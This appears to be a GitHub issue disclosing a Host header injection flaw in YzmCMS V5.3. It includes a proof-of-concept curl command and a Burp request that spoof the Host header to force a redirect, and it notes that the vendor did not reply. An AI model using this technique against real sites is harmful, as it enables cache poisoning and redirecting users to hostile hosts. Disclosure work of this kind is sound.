Skip to content

About YzmCMS V5.3- 'Host' Header Injection #28

Open
@dpalbd

Description

@dpalbd

Host header injection vulnerability found on YzmCMS V5.3, Using this attack, a malicious user can poison the web cache or arbitrary user re-direction.

PoC:
Test Environment: Windows 7 SP1(64bit)
XAMPP: 7.3.9
YzmCMS V5.3 Access Path: 192.168.30.169/yzmcms/

root@kali:~# curl http://192.168.30.169/yzmcms/member/ -H "Host: www.google.com"

<title>YzmCMS提示信息</title> <style type="text/css"> *{padding:0;margin:0;} body{background:#fff;color:#000;font-family:"Microsoft Yahei","Hiragino Sans GB","Helvetica Neue",Helvetica,tahoma,arial,"WenQuanYi Micro Hei",Verdana,sans-serif;} #msg{border:1px solid #5eb95e;width:500px;position:absolute;top:44%;left:50%;margin:-87px 0 0 -250px;padding:1px;line-height:30px;text-align:center;font-size:16px;background:#fff;} #msgtit{height:35px;line-height:35px;color:#fff;background:#5eb95e;} #msgbody{margin:20px 0;text-align:center} #info{margin-bottom:10px;} #msgbody p{font-size:14px;} #msgbody p a{font-size:14px;color:#333;text-decoration:none;} #msgbody p a:hover{color:#5a98de;} </style>
提示信息
请先登录!

本页面将在1秒后跳转...

root@kali:~#

image

Or if we capture this in burp:

GET /yzmcms/member/ HTTP/1.1
Host: 192.168.30.169
image

Next change the "Host" to www.google.com and "Go" for web request:
image

Then follow redirection
image

This will be re-directed to www.google.com with 404 responds.
Capture the responds and open the browser will show following:
image

This is detected & email to you on 18-Sep-2019, but no responds. So provide information in here. Thank you.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions